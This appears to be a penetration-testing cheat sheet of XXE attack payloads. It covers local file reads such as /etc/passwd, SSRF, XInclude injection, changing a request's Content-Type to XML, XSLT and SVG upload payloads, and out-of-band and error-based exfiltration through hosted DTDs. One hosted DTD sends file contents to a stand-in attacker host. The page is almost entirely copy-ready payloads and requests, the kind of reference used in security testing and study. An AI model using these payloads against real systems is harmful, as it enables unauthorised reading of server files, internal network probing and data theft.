Exploits
File Retrieval
Copy <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file://<path>"> ]>
<field>&xxe;</field> SSRF
Copy <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://<url>/"> ]>
<field>&xxe;</field> XInclude Attack
Useful for when the attacker doesn't control the whole XML structure but can only insert values in the fields (for instance as values returned from SOAP requests or populated from forms)
Read local file
Copy <foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo> SSRF
Copy <foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="<url>"/></foo> Example request
Copy POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
var=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="<url>"/></foo> XXE Through Modified Content-Type
In same cases it might be possible to trigger XXE vulnerabilities in requests that are not formatted as XML by setting the content type header to text/xml and rewriting the body of the request in order to be digested by an XML parser
POST Request
Original request
Copy POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
var=value Modified request
Copy POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52
<?xml version="1.0" encoding="UTF-8"?><var>value</var> JSON Body
Original request
Copy POST /action HTTP/1.0
Content-Type: application/json
Content-Length: 38
{"search":"name","value":"val"} Modified request
Copy POST /action HTTP/1.0
Content-Type: application/xml
Content-Length: 288
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root> XXE Through file upload
XSLT
Copy <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:value-of select="document('<path>')">
</xsl:value-of></xsl:template>
</xsl:stylesheet> SVG
Text will appear within the image
Copy <?xml version="1.0" standalone="yes"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file://<path>" > ]>
<svg width="256px" height="256px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="12" x="0" y="16">&xxe;</text>
</svg> Parametric payloads
SSRF
Copy <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "<url>"> %xxe; ]> File exfiltration
Hosted DTD
Copy <!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate; Actual payload
Copy <!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"http:<url to dtd file>"> %xxe;]> Error based file exfiltration
Hosted DTD
Copy <!ENTITY % file SYSTEM "file://<file>">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error; Error based with DTD override
Test if DTD exists on target
Copy <!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file://<local dtd>">
%local_dtd;
]> Payload
Copy <!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file://<path to local dtd>">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file://<target file>">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>